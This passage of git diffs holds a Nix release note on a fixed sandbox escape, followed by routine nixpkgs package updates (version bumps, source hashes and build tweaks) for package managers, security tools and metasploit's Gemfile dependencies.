a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md +new file mode 100644 +index 000000000..ed451711e +--- /dev/null ++++ b/doc/manual/rl-next/fod-sandbox-escape.md +@@ -0,0 +1,14 @@ ++--- ++synopsis: Fix a FOD sandbox escape ++issues: ++prs: ++--- ++ ++Cooperating Nix derivations could send file descriptors to files in the Nix ++store to each other via Unix domain sockets in the abstract namespace. This ++allowed one derivation to modify the output of the other derivation, after Nix ++has registered the path as "valid" and immutable in the Nix database. ++In particular, this allowed the output of fixed-output derivations to be ++modified from their expected content. ++ ++This isn't the case any more. diff --git a/nixpkgs/pkgs/tools/package-management/pacman/default.nix b/nixpkgs/pkgs/tools/package-management/pacman/default.nix index 800e392f0f24..90252dca9cb2 100644 --- a/nixpkgs/pkgs/tools/package-management/pacman/default.nix +++ b/nixpkgs/pkgs/tools/package-management/pacman/default.nix @@ -1,7 +1,6 @@ { lib , stdenv -, fetchpatch -, fetchurl +, fetchFromGitLab , asciidoc , binutils , coreutils @@ -39,19 +38,23 @@ , sysHookDir ? "/usr/share/libalpm/hooks/" }: -stdenv.mkDerivation rec { +stdenv.mkDerivation (final: { pname = "pacman"; - version = "6.0.2"; + version = "6.1.0"; - src = fetchurl { - url = "https://sources.archlinux.org/other/${pname}/${pname}-${version}.tar.xz"; - hash = "sha256-fY4+jFEhrsCWXfcfWb7fRgUsbPFPljZcRBHsPeCkwaU="; + src = fetchFromGitLab { + domain = "gitlab.archlinux.org"; + owner = "pacman"; + repo = "pacman"; + rev = "v${final.version}"; + hash = "sha256-uHBq1A//YSqFATlyqjC5ZgmvPkNKqp7sVew+nbmLH78="; }; strictDeps = true; nativeBuildInputs = [ asciidoc + gettext installShellFiles libarchive makeWrapper @@ -71,11 +74,6 @@ stdenv.mkDerivation rec { patches = [ ./dont-create-empty-dirs.patch - # Add keyringdir meson option to configure the keyring directory - (fetchpatch { - url = "https://gitlab.archlinux.org/pacman/pacman/-/commit/79bd512181af12ec80fd8f79486fc9508fa4a1b3.patch"; - hash = "sha256-ivTPwWe06Q5shn++R6EY0x3GC0P4X0SuC+F5sndfAtM="; - }) ]; postPatch = let compressionTools = [ @@ -93,16 +91,16 @@ stdenv.mkDerivation rec { substituteInPlace meson.build \ --replace "install_dir : SYSCONFDIR" "install_dir : '$out/etc'" \ --replace "join_paths(DATAROOTDIR, 'libalpm/hooks/')" "'${sysHookDir}'" \ - --replace "join_paths(PREFIX, DATAROOTDIR, get_option('keyringdir'))" "'\$KEYRING_IMPORT_DIR'" + --replace "join_paths(PREFIX, DATAROOTDIR, get_option('keyringdir'))" "'\$KEYRING_IMPORT_DIR'" \ + --replace "join_paths(SYSCONFDIR, 'makepkg.conf.d/')" "'$out/etc/makepkg.conf.d/'" substituteInPlace doc/meson.build \ --replace "/bin/true" "${coreutils}/bin/true" substituteInPlace scripts/repo-add.sh.in \ --replace bsdtar "${libarchive}/bin/bsdtar" substituteInPlace scripts/pacman-key.sh.in \ --replace "local KEYRING_IMPORT_DIR='@keyringdir@'" "" \ - --subst-var-by keyringdir '\$KEYRING_IMPORT_DIR' \ - --replace "--batch --check-trustdb" "--batch --check-trustdb --allow-weak-key-signatures" - ''; # the line above should be removed once Arch migrates to gnupg 2.3.x + --subst-var-by keyringdir '\$KEYRING_IMPORT_DIR' + ''; mesonFlags = [ "--sysconfdir=/etc" @@ -132,6 +130,7 @@ stdenv.mkDerivation rec { changelog = "https://gitlab.archlinux.org/pacman/pacman/-/raw/v${version}/NEWS"; license = licenses.gpl2Plus; platforms = platforms.linux; + mainProgram = "pacman"; maintainers = with maintainers; [ samlukeyes123 ]; }; -} +}) diff --git a/nixpkgs/pkgs/tools/package-management/pdm/default.nix b/nixpkgs/pkgs/tools/package-management/pdm/default.nix index 957b11b084fa..88ed0768b1d8 100644 --- a/nixpkgs/pkgs/tools/package-management/pdm/default.nix +++ b/nixpkgs/pkgs/tools/package-management/pdm/default.nix @@ -35,14 +35,14 @@ in with python.pkgs; buildPythonApplication rec { pname = "pdm"; - version = "2.12.3"; + version = "2.12.4"; pyproject = true; disabled = pythonOlder "3.8"; src = fetchPypi { inherit pname version; - hash = "sha256-U82rcnwUaf3Blu/Y1/+EBKPKke5DwKVxRzbyAg0KXd8="; + hash = "sha256-0Eh3Ni+Vz5/8HSw4uFH2k3BuSSiEDkiYauV22tV0FJY="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix b/nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix index cf4b0334dcd6..5e2cc63644ab 100644 --- a/nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix +++ b/nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix @@ -38,8 +38,8 @@ buildPythonPackage rec { pname = "poetry"; - version = "1.8.1"; - format = "pyproject"; + version = "1.8.2"; + pyproject = true; disabled = pythonOlder "3.8"; @@ -47,7 +47,7 @@ buildPythonPackage rec { owner = "python-poetry"; repo = "poetry"; rev = "refs/tags/${version}"; - hash = "sha256-tHtd5vO3TMjO0gqyECuS0FUAcE90nkKZwOm3ne6poFQ="; + hash = "sha256-MBWVeS/UHpzeeNUeiHMoXnLA3enRO/6yGIbg4Vf2GxU="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/package-management/protontricks/default.nix b/nixpkgs/pkgs/tools/package-management/protontricks/default.nix index 462a2546ff5d..c3c43163c671 100644 --- a/nixpkgs/pkgs/tools/package-management/protontricks/default.nix +++ b/nixpkgs/pkgs/tools/package-management/protontricks/default.nix @@ -16,13 +16,13 @@ buildPythonApplication rec { pname = "protontricks"; - version = "1.11.0"; + version = "1.11.1"; src = fetchFromGitHub { owner = "Matoking"; repo = pname; rev = version; - sha256 = "sha256-5FpcIaQodvNjdqUfD9hvXlrdhszr98j0zm3MCCpZFoc="; + sha256 = "sha256-a40IAFrzQ0mogMoXKb+Lp0fPc1glYophqtftigk3nAc="; }; patches = [ diff --git a/nixpkgs/pkgs/tools/security/arti/default.nix b/nixpkgs/pkgs/tools/security/arti/default.nix index d7368463ffd7..ef202fb69eb1 100644 --- a/nixpkgs/pkgs/tools/security/arti/default.nix +++ b/nixpkgs/pkgs/tools/security/arti/default.nix @@ -10,7 +10,7 @@ rustPlatform.buildRustPackage rec { pname = "arti"; - version = "1.1.13"; + version = "1.2.0"; src = fetchFromGitLab { domain = "gitlab.torproject.org"; @@ -18,10 +18,10 @@ rustPlatform.buildRustPackage rec { owner = "core"; repo = "arti"; rev = "arti-v${version}"; - hash = "sha256-Afbys0ChT1640PfKnAH/0Knl2IfKcrsCqqoxryFDPo0="; + hash = "sha256-ba07btx3eorFiocRk1YbkkGcblgsWaMI14r1SaPNr9g="; }; - cargoHash = "sha256-Y4JpVQU1wVwCWWaE5HMT+SaoRpmqzzhZjefbOOwPPRg="; + cargoHash = "sha256-+TVmmyjAFLDlnXMED0+S0M3VbGBRHds4C1GNyTGD4wI="; nativeBuildInputs = lib.optionals stdenv.isLinux [ pkg-config ]; @@ -35,8 +35,8 @@ rustPlatform.buildRustPackage rec { meta = with lib; { description = "An implementation of Tor in Rust"; - homepage = "https://gitlab.torproject.org/tpo/core/arti"; - changelog = "https://gitlab.torproject.org/tpo/core/arti/-/raw/${src.rev}/CHANGELOG.md"; + homepage = "https://arti.torproject.org/"; + changelog = "https://gitlab.torproject.org/tpo/core/arti/-/blob/${src.rev}/CHANGELOG.md"; license = with licenses; [ asl20 /* or */ mit ]; maintainers = with maintainers; [ marsam ]; }; diff --git a/nixpkgs/pkgs/tools/security/asnmap/default.nix b/nixpkgs/pkgs/tools/security/asnmap/default.nix index 44f2e09fc1a9..984f5340eeeb 100644 --- a/nixpkgs/pkgs/tools/security/asnmap/default.nix +++ b/nixpkgs/pkgs/tools/security/asnmap/default.nix @@ -5,16 +5,21 @@ buildGoModule rec { pname = "asnmap"; - version = "1.0.6"; + version = "1.1.0"; src = fetchFromGitHub { owner = "projectdiscovery"; - repo = pname; + repo = "asnmap"; rev = "refs/tags/v${version}"; - hash = "sha256-uX7mf1y30JngRI4UJYzghk2F4DZh9OQAjgkkNRbAgwc="; + hash = "sha256-Of4IVra6kMHY9btWcF9grM/r3lTWFP/geeT309Seasw="; }; - vendorHash = "sha256-co18Q8nfRjJyDfpmJ1YSJ275DJRJHn2AR3jF8WionNY="; + vendorHash = "sha256-RDv8vkBI3miyeNAbhUsMpuZCYRUZ0ATfXYHxaTgTVfA="; + + ldflags = [ + "-w" + "-s" + ]; # Tests require network access doCheck = false; diff --git a/nixpkgs/pkgs/tools/security/aws-iam-authenticator/default.nix b/nixpkgs/pkgs/tools/security/aws-iam-authenticator/default.nix index 6badf451368e..73750ce03e08 100644 --- a/nixpkgs/pkgs/tools/security/aws-iam-authenticator/default.nix +++ b/nixpkgs/pkgs/tools/security/aws-iam-authenticator/default.nix @@ -5,13 +5,13 @@ buildGoModule rec { pname = "aws-iam-authenticator"; - version = "0.6.17"; + version = "0.6.18"; src = fetchFromGitHub { owner = "kubernetes-sigs"; repo = pname; rev = "refs/tags/v${version}"; - hash = "sha256-CsurRQDPWJ/P/Q4aZhtUW8Z60+hgzw46+98N/QbFcTU="; + hash = "sha256-QhtDfi6USazpPq+7VnJX9YqTxsm7y1CZpIXiZyHaGG4="; }; vendorHash = "sha256-TDsY05jnutNIKx0z6/8vGvsgYCIKBkTxh9mXqk4IR38="; diff --git a/nixpkgs/pkgs/tools/security/bruteforce-luks/default.nix b/nixpkgs/pkgs/tools/security/bruteforce-luks/default.nix index 084368c105b2..a6e0f3cc104b 100644 --- a/nixpkgs/pkgs/tools/security/bruteforce-luks/default.nix +++ b/nixpkgs/pkgs/tools/security/bruteforce-luks/default.nix @@ -2,10 +2,10 @@ stdenv.mkDerivation rec { pname = "bruteforce-luks"; - version = "1.4.0"; + version = "1.4.1"; src = fetchFromGitHub { - sha256 = "0yyrda077avdapq1mvavgv5mvj2r94d6p01q56bbnaq4a3h5kfd6"; + sha256 = "sha256-t07YyfCjaXQs/OMekcPNBT8DeSRtq2+8tUpsPP2pG7o="; rev = version; repo = "bruteforce-luks"; owner = "glv2"; diff --git a/nixpkgs/pkgs/tools/security/buttercup-desktop/default.nix b/nixpkgs/pkgs/tools/security/buttercup-desktop/default.nix index a3eb00d3fe45..ffbfe1d3791c 100644 --- a/nixpkgs/pkgs/tools/security/buttercup-desktop/default.nix +++ b/nixpkgs/pkgs/tools/security/buttercup-desktop/default.nix @@ -2,10 +2,10 @@ let pname = "buttercup-desktop"; - version = "2.24.4"; + version = "2.26.0"; src = fetchurl { url = "https://github.com/buttercup/buttercup-desktop/releases/download/v${version}/Buttercup-linux-x86_64.AppImage"; - sha256 = "sha256-c5MLj/1OSjGsySCENeJqEhubxl2y7uDhnOBAtLGy92I="; + sha256 = "sha256-fsHyHljHk2e/pxzz7jYv639ob0D6gTMA3U4OXxbvYz8="; }; appimageContents = appimageTools.extractType2 { inherit pname src version; }; diff --git a/nixpkgs/pkgs/tools/security/cdxgen/default.nix b/nixpkgs/pkgs/tools/security/cdxgen/default.nix index 3b437a70633c..858682ed27f1 100644 --- a/nixpkgs/pkgs/tools/security/cdxgen/default.nix +++ b/nixpkgs/pkgs/tools/security/cdxgen/default.nix @@ -5,16 +5,16 @@ buildNpmPackage rec { pname = "cdxgen"; - version = "10.0.5"; + version = "10.2.1"; src = fetchFromGitHub { owner = "AppThreat"; repo = pname; rev = "v${version}"; - sha256 = "sha256-0cRJdhP0OtzaV2NqRfoYz+Gkl+N3/REbPiOh0jQySK8="; + sha256 = "sha256-X359aLnC0FAiS3pOBQsjmdik01zjZayTvwBLk3sj8ew="; }; - npmDepsHash = "sha256-AlO3AC03JVTbgqdFSJb2L/QYuMQxjqzGGZYapte0uxc="; + npmDepsHash = "sha256-1vPdKD1Ul+6hq8dYxscL4YLmefnP2zOWRtQWyO6Q0eQ="; dontNpmBuild = true; diff --git a/nixpkgs/pkgs/tools/security/cfripper/default.nix b/nixpkgs/pkgs/tools/security/cfripper/default.nix index aac55cf46b74..51fa61067425 100644 --- a/nixpkgs/pkgs/tools/security/cfripper/default.nix +++ b/nixpkgs/pkgs/tools/security/cfripper/default.nix @@ -12,23 +12,24 @@ let }; in python.pkgs.buildPythonApplication rec { pname = "cfripper"; - version = "1.15.4"; + version = "1.15.6"; pyproject = true; src = fetchFromGitHub { owner = "Skyscanner"; repo = "cfripper"; rev = "refs/tags/v${version}"; - hash = "sha256-heVFum+Eaofd9L0dNHqD9GgHP+ckGwJi+NfeFci+ESc="; + hash = "sha256-h/NNTE5u1coyD4owiGjsK6SIuvDq1SQOPW4RM4yJtno="; }; - postPatch = '' - substituteInPlace setup.py \ - --replace "pluggy~=0.13.1" "pluggy" \ - ''; + pythonRelaxDeps = [ + "pluggy" + ]; nativeBuildInputs = with python.pkgs; [ + pythonRelaxDepsHook setuptools + setuptools-scm ]; propagatedBuildInputs = with python.pkgs; [ diff --git a/nixpkgs/pkgs/tools/security/cnspec/default.nix b/nixpkgs/pkgs/tools/security/cnspec/default.nix index 8e63a0dde771..d6393efc753e 100644 --- a/nixpkgs/pkgs/tools/security/cnspec/default.nix +++ b/nixpkgs/pkgs/tools/security/cnspec/default.nix @@ -5,17 +5,18 @@ buildGoModule rec { pname = "cnspec"; - version = "10.2.0"; + version = "10.6.1"; src = fetchFromGitHub { owner = "mondoohq"; repo = "cnspec"; rev = "refs/tags/v${version}"; - hash = "sha256-llX9MXlc0uMz60BjI1QFd6r/xqHBO2KCek2Q8F+TV04="; + hash = "sha256-wQ11ZHyUh1bSrvWQLTSyOc+EtFp4QS9zcjNz1S+UP7Y="; }; proxyVendor = true; - vendorHash = "sha256-pdf9q+bvR0kbT17ZQmUcdc2AdEUt12+2iIx+aRmtTYg="; + + vendorHash = "sha256-Z7zPvm3CjHnmGdTvO8ETwgRijcRyGReZ6ba7llOkyME="; subPackages = [ "apps/cnspec" diff --git a/nixpkgs/pkgs/tools/security/dnsx/default.nix b/nixpkgs/pkgs/tools/security/dnsx/default.nix index 648f7883788e..1f25de07c174 100644 --- a/nixpkgs/pkgs/tools/security/dnsx/default.nix +++ b/nixpkgs/pkgs/tools/security/dnsx/default.nix @@ -5,16 +5,16 @@ buildGoModule rec { pname = "dnsx"; - version = "1.1.6"; + version = "1.2.1"; src = fetchFromGitHub { owner = "projectdiscovery"; repo = "dnsx"; rev = "refs/tags/v${version}"; - hash = "sha256-dyqZXc5k76BwF2Kh2vm9d+dpvgpXK/8VQeGjx1UzA6k="; + hash = "sha256-scp0CDIO8F2TqpSCgXXfb8I83stvO/GZqSA5/BkN8pE="; }; - vendorHash = "sha256-S1mJMVfQSy49Lm4q3v05kjbXBlBgBt/AAzLOoQkk75A="; + vendorHash = "sha256-WbFkBTPy4N+mAVSkq1q9XcNs1jk6YuBcYxiEmQV/TsM="; # Tests require network access doCheck = false; diff --git a/nixpkgs/pkgs/tools/security/doppler/default.nix b/nixpkgs/pkgs/tools/security/doppler/default.nix index c90cf8c2725e..4707240857fc 100644 --- a/nixpkgs/pkgs/tools/security/doppler/default.nix +++ b/nixpkgs/pkgs/tools/security/doppler/default.nix @@ -8,13 +8,13 @@ buildGoModule rec { pname = "doppler"; - version = "3.67.0"; + version = "3.67.1"; src = fetchFromGitHub { owner = "dopplerhq"; repo = "cli"; rev = version; - sha256 = "sha256-aBdpcmKv8EwUu8MKsC/aoSkiXf+JuTmhpGrPauWpThc="; + sha256 = "sha256-O49lBoazT3VNopXvBBhOynsla4W00VkiBAO0+i2rsbc="; }; vendorHash = "sha256-NUHWKPszQH/pvnA+j65+bJ6t+C0FDRRbTviqkYztpE4="; diff --git a/nixpkgs/pkgs/tools/security/exploitdb/default.nix b/nixpkgs/pkgs/tools/security/exploitdb/default.nix index 6e7a553cf167..ca9a7000e98b 100644 --- a/nixpkgs/pkgs/tools/security/exploitdb/default.nix +++ b/nixpkgs/pkgs/tools/security/exploitdb/default.nix @@ -6,13 +6,13 @@ stdenv.mkDerivation rec { pname = "exploitdb"; - version = "2024-02-27"; + version = "2024-03-07"; src = fetchFromGitLab { owner = "exploit-database"; repo = pname; rev = "refs/tags/${version}"; - hash = "sha256-bFCh1kNm7D71PoRoSHdm1qYGGNvYnEb9cLbZerVy5vw="; + hash = "sha256-f+xg4uR//1ffssH2PAN9ta/osCrY7+s6SI1Kfvfq8cQ="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/security/feroxbuster/default.nix b/nixpkgs/pkgs/tools/security/feroxbuster/default.nix index 18af1a0f1c48..5871895cd9c0 100644 --- a/nixpkgs/pkgs/tools/security/feroxbuster/default.nix +++ b/nixpkgs/pkgs/tools/security/feroxbuster/default.nix @@ -9,13 +9,13 @@ rustPlatform.buildRustPackage rec { pname = "feroxbuster"; - version = "2.10.1"; + version = "2.10.2"; src = fetchFromGitHub { owner = "epi052"; repo = pname; rev = "refs/tags/v${version}"; - hash = "sha256-AFh/IeB88NYPsyUqzaN92GoDbAgl+HG87cIy+Ni06Q8="; + hash = "sha256-jsaUSnqzqeKxos8fDvaOAzuGWxn5tJYjFp4qolWRRs4="; }; # disable linker overrides on aarch64-linux @@ -23,7 +23,7 @@ rustPlatform.buildRustPackage rec { rm .cargo/config ''; - cargoHash = "sha256-Fu3qw3qRK3TZlzK1WcmI/GQ5TM1j+gbGoedwp18SolY="; + cargoHash = "sha256-xACWDgFrZXcxbfczR9tfT1CTaPnDHBITbg3x8+708gE="; OPENSSL_NO_VENDOR = true; diff --git a/nixpkgs/pkgs/tools/security/gotestwaf/default.nix b/nixpkgs/pkgs/tools/security/gotestwaf/default.nix index 69afb96a47e2..c9fbe9f699eb 100644 --- a/nixpkgs/pkgs/tools/security/gotestwaf/default.nix +++ b/nixpkgs/pkgs/tools/security/gotestwaf/default.nix @@ -7,13 +7,13 @@ buildGoModule rec { pname = "gotestwaf"; - version = "0.4.12"; + version = "0.4.15"; src = fetchFromGitHub { owner = "wallarm"; repo = "gotestwaf"; rev = "refs/tags/v${version}"; - hash = "sha256-av6N6RQ+9iW+xG1FpmFjBHL1leU4P0IPiqf7kvJxm6M="; + hash = "sha256-C5lDiHDSSweUZh83AOv5WIQ4JuC9OiCvpHshgius51k="; }; vendorHash = null; diff --git a/nixpkgs/pkgs/tools/security/hfinger/default.nix b/nixpkgs/pkgs/tools/security/hfinger/default.nix index 8d3d7e25d33f..900f7402451d 100644 --- a/nixpkgs/pkgs/tools/security/hfinger/default.nix +++ b/nixpkgs/pkgs/tools/security/hfinger/default.nix @@ -7,15 +7,19 @@ python3.pkgs.buildPythonApplication rec { pname = "hfinger"; version = "0.2.2"; - disabled = python3.pythonOlder "3.3"; + pyproject = true; src = fetchFromGitHub { owner = "CERT-Polska"; - repo = pname; + repo = "hfinger"; rev = "refs/tags/v${version}"; - sha256 = "sha256-gxwirAqtY4R3KDHyNmDIknABO+SFuoDua9nm1UyXbxA="; + hash = "sha256-gxwirAqtY4R3KDHyNmDIknABO+SFuoDua9nm1UyXbxA="; }; + nativeBuildInputs = with python3.pkgs; [ + setuptools + ]; + propagatedBuildInputs = with python3.pkgs; [ fnvhash python-magic @@ -25,11 +29,15 @@ python3.pkgs.buildPythonApplication rec { # Project has no tests doCheck = false; - pythonImportsCheck = [ "hfinger" ]; + + pythonImportsCheck = [ + "hfinger" + ]; meta = with lib; { description = "Fingerprinting tool for HTTP requests"; homepage = "https://github.com/CERT-Polska/hfinger"; + changelog = "https://github.com/CERT-Polska/hfinger/releases/tag/v${version}"; license = with licenses; [ gpl3Only ]; maintainers = with maintainers; [ fab ]; }; diff --git a/nixpkgs/pkgs/tools/security/himitsu/default.nix b/nixpkgs/pkgs/tools/security/himitsu/default.nix index ae647768c7f4..d6bbb8fd6921 100644 --- a/nixpkgs/pkgs/tools/security/himitsu/default.nix +++ b/nixpkgs/pkgs/tools/security/himitsu/default.nix @@ -7,14 +7,14 @@ stdenv.mkDerivation rec { pname = "himitsu"; - version = "0.5"; + version = "0.6"; src = fetchFromSourcehut { name = pname + "-src"; owner = "~sircmpwn"; repo = pname; rev = version; - hash = "sha256-rZ3gzVz7V3psHAMxTCaJXZh4uP4gIeyb9Bf23kzCBWg="; + hash = "sha256-3x6Lc1rWBtYWVocBuMV5CtoZQjL0Ce+6J2xFjaYaeG4="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/security/httpx/default.nix b/nixpkgs/pkgs/tools/security/httpx/default.nix index 98f41b9c599f..3fb537142958 100644 --- a/nixpkgs/pkgs/tools/security/httpx/default.nix +++ b/nixpkgs/pkgs/tools/security/httpx/default.nix @@ -5,16 +5,16 @@ buildGoModule rec { pname = "httpx"; - version = "1.4.0"; + version = "1.6.0"; src = fetchFromGitHub { owner = "projectdiscovery"; repo = "httpx"; rev = "refs/tags/v${version}"; - hash = "sha256-G+N9Zo8MbXbCRB21SvxSNftvn5v8Ss+I0v7Lj30CgJo="; + hash = "sha256-q8R3X1U2Dma0A9WRWIFPSRQHndNJFE2YdfMyPEM6dr8="; }; - vendorHash = "sha256-fy4yJkwBlVNRn8FWHtZHCMcCF7LQXsDhEYVSv4RVcBM="; + vendorHash = "sha256-M7oxM0hMaOT78CxbSGyYk0nhGJC8dLWAlzi/b//EiHw="; subPackages = [ "cmd/httpx" diff --git a/nixpkgs/pkgs/tools/security/jwx/default.nix b/nixpkgs/pkgs/tools/security/jwx/default.nix index cb418b4a9657..224962825888 100644 --- a/nixpkgs/pkgs/tools/security/jwx/default.nix +++ b/nixpkgs/pkgs/tools/security/jwx/default.nix @@ -5,13 +5,13 @@ buildGoModule rec { pname = "jwx"; - version = "2.0.20"; + version = "2.0.21"; src = fetchFromGitHub { owner = "lestrrat-go"; repo = pname; rev = "v${version}"; - hash = "sha256-+of0eYBwdGC9vb0DDqxMIuhXNTCRRv9iGOIVJGobMxc="; + hash = "sha256-Rg3E+7kyyzY8NqfXMH3ENWAuCxx7+3DyyarfGNI9xxE="; }; vendorHash = "sha256-HHq4B0MYP2gUtV9ywrXVmWN7OpV6NVb49rVMFblOgPc="; diff --git a/nixpkgs/pkgs/tools/security/knockpy/default.nix b/nixpkgs/pkgs/tools/security/knockpy/default.nix index a3342e0b3809..5b68560c1fa3 100644 --- a/nixpkgs/pkgs/tools/security/knockpy/default.nix +++ b/nixpkgs/pkgs/tools/security/knockpy/default.nix @@ -5,30 +5,39 @@ python3.pkgs.buildPythonApplication rec { pname = "knockpy"; - version = "6.1.0"; - format = "setuptools"; + version = "7.0.0"; + pyproject = true; src = fetchFromGitHub { owner = "guelfoweb"; repo = "knock"; rev = "refs/tags/${version}"; - hash = "sha256-O4tXq4pDzuTBEGAls2I9bfBRdHssF4rFBec4OtfUx6A="; + hash = "sha256-Xtv7K19OBS2iHFFoSasNcy9VLL15eQ8AD79wAEhxCHk="; }; + pythonRelaxDeps = [ + "beautifulsoup4" + "tqdm" + ]; + + nativeBuildInputs = with python3.pkgs; [ + pythonRelaxDepsHook + setuptools + ]; + propagatedBuildInputs = with python3.pkgs; [ beautifulsoup4 - colorama - matplotlib - networkx - pyqt5 + dnspython + pyopenssl requests + tqdm ]; # Project has no tests doCheck = false; pythonImportsCheck = [ - "knockpy" + "knock" ]; meta = with lib; { diff --git a/nixpkgs/pkgs/tools/security/kube-bench/default.nix b/nixpkgs/pkgs/tools/security/kube-bench/default.nix index 28b90f3d4bae..673dde4a58a1 100644 --- a/nixpkgs/pkgs/tools/security/kube-bench/default.nix +++ b/nixpkgs/pkgs/tools/security/kube-bench/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "kube-bench"; - version = "0.7.1"; + version = "0.7.2"; src = fetchFromGitHub { owner = "aquasecurity"; repo = pname; rev = "refs/tags/v${version}"; - hash = "sha256-EsUjGc7IIu5PK9KaODlQSfmm8jpjuBXvGZPNjSc1824="; + hash = "sha256-e8iB66fXc8lKwFEZlkk4qbsgExKUrf5WpEVCOiHiZUg="; }; - vendorHash = "sha256-i4k7eworPUvLUustr5U53qizHqUVw8yqGjdPQT6UIf4="; + vendorHash = "sha256-8DWjuweGCx2yxocm1GvcP+O3QYWYUdOFKmu6neQfWI4="; nativeBuildInputs = [ installShellFiles ]; diff --git a/nixpkgs/pkgs/tools/security/ldeep/default.nix b/nixpkgs/pkgs/tools/security/ldeep/default.nix index 6e44829f7ee9..ddbff2357271 100644 --- a/nixpkgs/pkgs/tools/security/ldeep/default.nix +++ b/nixpkgs/pkgs/tools/security/ldeep/default.nix @@ -5,14 +5,14 @@ python3.pkgs.buildPythonApplication rec { pname = "ldeep"; - version = "1.0.52"; + version = "1.0.53"; pyproject = true; src = fetchFromGitHub { owner = "franc-pentest"; repo = "ldeep"; rev = "refs/tags/${version}"; - hash = "sha256-I51vz3zF1J3223hcO3cdfsNBfpq/UolDxUEXyqx3dLI="; + hash = "sha256-67jVpzvdjEcjFmTRE2YjPr4AO1iN+PakwoKcjvimt8g="; }; pythonRelaxDeps = [ diff --git a/nixpkgs/pkgs/tools/security/metabigor/default.nix b/nixpkgs/pkgs/tools/security/metabigor/default.nix index 84e4d39d6a2c..2949fb6db541 100644 --- a/nixpkgs/pkgs/tools/security/metabigor/default.nix +++ b/nixpkgs/pkgs/tools/security/metabigor/default.nix @@ -5,16 +5,21 @@ buildGoModule rec { pname = "metabigor"; - version = "1.12.1"; + version = "2.0.0"; src = fetchFromGitHub { owner = "j3ssie"; - repo = pname; - rev = "v${version}"; - sha256 = "sha256-T1P+jAAsKObKRaoxH8c/DMEfXtmSrvnDd5Y3ocKcCSc="; + repo = "metabigor"; + rev = "refs/tags/v${version}"; + hash = "sha256-JFt9PC6VHWTYuaIWh2t2BiGFm1tGwZDdhhdp2xtmXSI="; }; - vendorHash = "sha256-V+72l2TvhEWgDg7kvn5OOjYcyEgWGLgTGnt58Bu+AEQ="; + vendorHash = "sha256-PGUOTEFcOL1pG+itTp9ce1qW+1V6hts8jKpA0E8orDk="; + + ldflags = [ + "-w" + "-s" + ]; # Disabled for now as there are some failures ("undefined:") doCheck = false; @@ -22,7 +27,9 @@ buildGoModule rec { meta = with lib; { description = "Tool to perform OSINT tasks"; homepage = "https://github.com/j3ssie/metabigor"; + changelog = "https://github.com/j3ssie/metabigor/releases/tag/v${version}"; license = licenses.mit; maintainers = with maintainers; [ fab ]; + mainProgram = "metabigor"; }; } diff --git a/nixpkgs/pkgs/tools/security/metasploit/Gemfile b/nixpkgs/pkgs/tools/security/metasploit/Gemfile index 3f528744390e..20860f2e5d79 100644 --- a/nixpkgs/pkgs/tools/security/metasploit/Gemfile +++ b/nixpkgs/pkgs/tools/security/metasploit/Gemfile @@ -1,4 +1,4 @@ # frozen_string_literal: true source "https://rubygems.org" -gem "metasploit-framework", git: "https://github.com/rapid7/metasploit-framework", ref: "refs/tags/6.3.57" +gem "metasploit-framework", git: "https://github.com/rapid7/metasploit-framework", ref: "refs/tags/6.3.58" diff --git a/nixpkgs/pkgs/tools/security/metasploit/Gemfile.lock b/nixpkgs/pkgs/tools/security/metasploit/Gemfile.lock index 04cc6dd3fbfd..662512b54dca 100644 --- a/nixpkgs/pkgs/tools/security/metasploit/Gemfile.lock +++ b/nixpkgs/pkgs/tools/security/metasploit/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: https://github.com/rapid7/metasploit-framework - revision: e01334b3bd267539df650f14627231fb8e4bc21d - ref: refs/tags/6.3.57 + revision: 08ebefe2368f73ceeac2c5f9c20a49a82d6a969e + ref: refs/tags/6.3.58 specs: - metasploit-framework (6.3.57) + metasploit-framework (6.3.58) actionpack (~> 7.0.0) activerecord (~> 7.0.0) activesupport (~> 7.0.0) @@ -106,25 +106,25 @@ GEM remote: https://rubygems.org/ specs: Ascii85 (1.1.0) - actionpack (7.0.8) - actionview (= 7.0.8) - activesupport (= 7.0.8) + actionpack (7.0.8.1) + actionview (= 7.0.8.1) + activesupport (= 7.0.8.1) rack (~> 2.0, >= 2.2.4) rack-test (>= 0.6.3) rails-dom-testing (~> 2.0) rails-html-sanitizer (~> 1.0, >= 1.2.0) - actionview (7.0.8) - activesupport (= 7.0.8) + actionview (7.0.8.1) + activesupport (= 7.0.8.1) builder (~> 3.1) erubi (~> 1.4) rails-dom-testing (~> 2.0) rails-html-sanitizer (~> 1.1, >= 1.2.0) - activemodel (7.0.8) - activesupport (= 7.0.8) - activerecord (7.0.8) - activemodel (= 7.0.8) - activesupport (= 7.0.8) - activesupport (7.0.8) + activemodel (7.0.8.1) + activesupport (= 7.0.8.1) + activerecord (7.0.8.1) + activemodel (= 7.0.8.1) + activesupport (= 7.0.8.1) + activesupport (7.0.8.1) concurrent-ruby (~> 1.0, >= 1.0.2) i18n (>= 1.6, < 2) minitest (>= 5.1) @@ -135,50 +135,51 @@ GEM arel-helpers (2.14.0) activerecord (>= 3.1.0, < 8) aws-eventstream (1.3.0) - aws-partitions (1.872.0) - aws-sdk-core (3.190.1) + aws-partitions (1.895.0) + aws-sdk-core (3.191.3) aws-eventstream (~> 1, >= 1.3.0) aws-partitions (~> 1, >= 1.651.0) aws-sigv4 (~> 1.8) jmespath (~> 1, >= 1.6.1) - aws-sdk-ec2 (1.431.0) - aws-sdk-core (~> 3, >= 3.188.0) + aws-sdk-ec2 (1.440.0) + aws-sdk-core (~> 3, >= 3.191.0) aws-sigv4 (~> 1.1) - aws-sdk-ec2instanceconnect (1.36.0) - aws-sdk-core (~> 3, >= 3.188.0) + aws-sdk-ec2instanceconnect (1.37.0) + aws-sdk-core (~> 3, >= 3.191.0) aws-sigv4 (~> 1.1) - aws-sdk-iam (1.92.0) - aws-sdk-core (~> 3, >= 3.188.0) + aws-sdk-iam (1.94.0) + aws-sdk-core (~> 3, >= 3.191.0) aws-sigv4 (~> 